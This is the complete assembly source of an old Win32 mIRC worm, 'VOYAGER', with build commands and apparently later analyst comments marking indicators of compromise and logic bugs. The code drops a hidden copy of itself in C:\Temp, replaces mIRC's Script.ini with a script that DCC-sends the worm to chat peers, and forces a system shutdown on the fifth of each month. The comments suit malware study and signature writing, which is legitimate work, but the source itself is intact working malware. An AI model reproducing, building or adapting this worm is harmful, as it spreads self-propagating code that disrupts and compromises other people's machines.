;
; VOYAGER.mIRC.Worm.Win32
; by Bumblebee/[Hail and Kill]
;
; . This is a simple mIRC worm. Creates -if not exists- a directory
; called 'C:\Temp' and stores there 'Voyager.exe'. Then searches for
; mIRC in 'c:\mirc' and 'c:\mirc32'. If mIRC is found then deletes
; the 'script.ini' and writes its own script.
;
; . Sets to 'Voyager.exe' read-only and hidden attributes.
; . ExitWindows if Voyager is executed in payload date.
;
; . Is a Win32 program -only uses API- and due to this it must work
; fine under Win95/Win98/WinNT. Is small but -fucking windows- its
; size is 4096 bytes long.
;
; tasm /ml /m3 v32,,;
; tlink32 -Tpe -c v32,v32,, import32.lib
;
; Assembler setup (TASM, Ideal-less MASM mode): 32-bit flat model, STDCALL
; for the Win32 imports below. 'locals' scopes @@labels, 'jumps' lets the
; assembler expand out-of-range conditional jumps.
.386
locals
jumps
.model flat,STDCALL
; procs to import
; Every external symbol is a plain kernel32/user32 API; there is no
; anti-analysis, no encryption and no self-modification in this sample,
; so the import list alone describes its capabilities (file write/copy,
; directory manipulation, time check, forced shutdown).
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn CloseHandle:PROC
extrn DeleteFileA:PROC
extrn ExitProcess:PROC
extrn GetCommandLineA:PROC
extrn GetCurrentDirectoryA:PROC
extrn SetCurrentDirectoryA:PROC
extrn CreateDirectoryA:PROC
extrn VirtualAlloc:PROC
extrn CopyFileA:PROC
extrn SetFileAttributesA:PROC
extrn GetSystemTime:PROC
extrn ExitWindowsEx:PROC
; virusSize is declared but never referenced in this file (the 4096-byte
; figure in the header is the PE on-disk size, not a code constant).
virusSize equ 4096
; Byte length of the mIRC script payload, computed from the two labels
; that bracket it in .DATA; this is the nNumberOfBytesToWrite for WriteFile.
scriptSize equ endScript-mIRCScript
.DATA
; Cleartext identification string. Useful as a static signature: it appears
; verbatim in the dropped binary and is echoed into the generated script.ini.
db 0dh,0ah
id db 'VOYAGER.mIRC.Worm.Win32 by Bumblebee/[Hail and Kill]',0
db 0dh,0ah
; Host-side artefacts created by this sample (all hard-coded, ASCII, no
; obfuscation): the target mIRC script file, the drop directory and the
; dropped copy of the executable.
scriptName db 'Script.ini',0
virusDir db 'C:\Temp',0
destVir db 'C:\Temp\Voyager.exe',0
; Replacement mIRC script written over the victim's Script.ini. The n0/n1
; handlers react to channel text; n2 hooks FILESENT so that a DCC transfer
; of the dropped copy is offered back to the peer. This text is the
; worm's propagation vector and is a good content-based detection anchor.
mIRCScript db '[SCRIPT]',0,0dh,0ah
db 'n0=on 1:TEXT:*sting*:#:/msg $chan VOYAGER.mIRC.Worm.Win32'
db ' by Bumblebee/[Hail and Kill] at your service!',0
db 0dh,0ah
db 'n1=on 1:TEXT:*bee*:#:/msg $chan The way of the bee!',0
db 0dh,0ah
db 'n2=on 1:TEXT:FILESENT:*.*:/if ( $me != $nick ) { /dcc send'
db ' $nick c:\temp\voyager.exe }',0,0dh,0ah
endScript db 0
; Candidate mIRC install directories probed with SetCurrentDirectoryA.
mIRCDir0 db 'c:\mirc',0
mIRCDir1 db 'c:\mirc32',0
; Runtime state.
fHnd dd ?                       ; handle of the freshly created Script.ini
cdirHnd dd ?                    ; pointer (not a handle) to the 1024-byte
                                ; VirtualAlloc buffer holding the original cwd
commandLine dd ?                ; GetCommandLineA result, truncated after '.EXE'
size2Read dd 0                  ; receives lpNumberOfBytesWritten from WriteFile
sysTimeStruct db 16 dup(0)      ; SYSTEMTIME (16 bytes) for the date trigger
.CODE
;-----------------------------------------------------------------------
; inicio — program entry point (no arguments, never returns; exits via
; ExitProcess). Flow: locate own path from the command line -> save cwd
; -> create C:\Temp -> copy self to C:\Temp\Voyager.exe (hidden+readonly)
; -> probe c:\mirc / c:\mirc32 -> replace Script.ini -> restore cwd ->
; on day 5 of any month call ExitWindowsEx(EWX_SHUTDOWN|EWX_FORCE).
; All API calls are STDCALL (callee cleans the stack); eax is the only
; register used as scratch.
;-----------------------------------------------------------------------
inicio:
call GetCommandLineA ; get command line
mov dword ptr [commandLine],eax
; Walk the command line until the 4 bytes ".EXE" are found (the TASM
; multi-char constant 'EXE.' is laid out in memory as ".EXE"), then
; NUL-terminate right after it so commandLine holds only the module path.
; NOTE(review): the scan is unbounded and the match is case-sensitive; it
; relies on the loader supplying an upper-case ".EXE" in the command line.
skipArgs: ; skip args
cmp dword ptr [eax],'EXE.'
je argsOk
inc eax
jmp skipArgs
argsOk:
add eax,4
mov byte ptr [eax],0
; VirtualAlloc(NULL, 1024, MEM_COMMIT, PAGE_READWRITE) — scratch buffer
; used only to hold the original current directory. It is never freed.
push 00000004h ; read/write page
push 00001000h ; mem commit (reserve phys mem)
push 1024 ; size to alloc
push 0h ; let system decide where to alloc
call VirtualAlloc
cmp eax,0
je goOut ; ops... not memory to alloc?
mov dword ptr [cdirHnd],eax
; GetCurrentDirectoryA(1024, buffer) — saved so it can be restored at goOut.
; A zero return skips straight to goErrOut (no restore attempted).
push dword ptr [cdirHnd] ; get current directory
push 1024
call GetCurrentDirectoryA
cmp eax,0
je goErrOut
; Ensure C:\Temp exists: try to chdir into it; if that fails, create it
; and retry. CreateDirectoryA failing (e.g. no write permission on C:\)
; aborts the install and falls through to cleanup.
goDir:
lea eax,virusDir
push eax
call SetCurrentDirectoryA
cmp eax,0
jne skipCreateDir ; directory exists
xor eax,eax
push 0
lea eax,virusDir
push eax
call CreateDirectoryA ; create the directory
cmp eax,0
je goOut
jmp goDir
skipCreateDir:
; CopyFileA(commandLine, "C:\Temp\Voyager.exe", bFailIfExists=FALSE).
; Filesystem IoC: a copy of the running image appears at destVir.
push 0 ; overwrite if exists
lea eax,destVir
push eax
push dword ptr [commandLine]
call CopyFileA ; install Voyager into c:\Temp
cmp eax,0
je mIRCCheck
; SetFileAttributesA(destVir, FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_HIDDEN)
; — hides the dropped copy from a default Explorer view.
push 00000001h OR 00000002h ; set read only and hidden
lea eax,destVir
push eax
call SetFileAttributesA ; set voyager new attributes
mIRCCheck:
; Probe for mIRC by attempting to chdir into the two hard-coded paths.
; NOTE(review): SetCurrentDirectoryA returns nonzero on success, so with
; the tests written as they are, installScript is reached when the chdir
; into c:\mirc fails, or when c:\mirc succeeds and c:\mirc32 fails; the
; author's inline comments describe the intended, not the actual, branch
; meaning. Script.ini is written into whatever directory is current when
; installScript is reached (C:\Temp or c:\mirc under this logic).
lea eax,mIRCDir0
push eax
call SetCurrentDirectoryA
cmp eax,0
je installScript ; directory exists -> mIRC found!
lea eax,mIRCDir1
push eax
call SetCurrentDirectoryA
cmp eax,0
jne goOut ; directory exists -> mIRC found!
installScript:
; Remove the existing Script.ini, then recreate it:
; CreateFileA(scriptName, GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE,
;             NULL, CREATE_NEW, FILE_ATTRIBUTE_ARCHIVE, NULL).
; CREATE_NEW is why the DeleteFileA must succeed first; a leftover
; (e.g. read-only) Script.ini makes CreateFileA return INVALID_HANDLE_VALUE.
lea eax,scriptName
push eax ; delete script.ini
call DeleteFileA
xor eax,eax
push eax
push 00000020h ; archive
push 1
push eax
push 00000001h OR 00000002h
push 40000000h
lea eax,scriptName
push eax
call CreateFileA ; open new script for write (shared)
cmp eax,-1
je goOut
mov dword ptr [fHnd],eax
; WriteFile(fHnd, mIRCScript, scriptSize, &size2Read, NULL). The return
; value is not checked; the handle is closed regardless.
push 0
mov dword ptr [size2Read],0
lea eax,size2Read
push eax
mov eax,scriptSize
push eax
lea eax,mIRCScript
push eax
push dword ptr [fHnd]
call WriteFile ; write script.ini
mov eax,dword ptr [fHnd] ; close file
push eax
call CloseHandle
goOut:
; Put the process back into the directory it started in, so the host
; application (if any) sees no change.
push dword ptr [cdirHnd] ; restore work directory
call SetCurrentDirectoryA
goErrOut:
; Date-triggered payload: GetSystemTime fills SYSTEMTIME; the word at
; offset 6 is wDay. On the 5th of any month the system is forced down.
lea eax,sysTimeStruct ; check for payload
push eax
call GetSystemTime
lea eax,sysTimeStruct ; 5th day of month?
cmp word ptr [eax+6],5
jne exitLoop
; ExitWindowsEx(EWX_SHUTDOWN|EWX_FORCE, dwReserved) — the same value (5)
; is pushed for both parameters; the reserved argument is ignored by the API.
xor eax,eax
mov eax,1
or eax,4
push eax
push eax
call ExitWindowsEx ; close windows ;)
exitLoop:
; ExitProcess(0) never returns; the trailing jmp is unreachable padding.
push 0h ; exit
call ExitProcess
jmp exitLoop
Ends
End inicio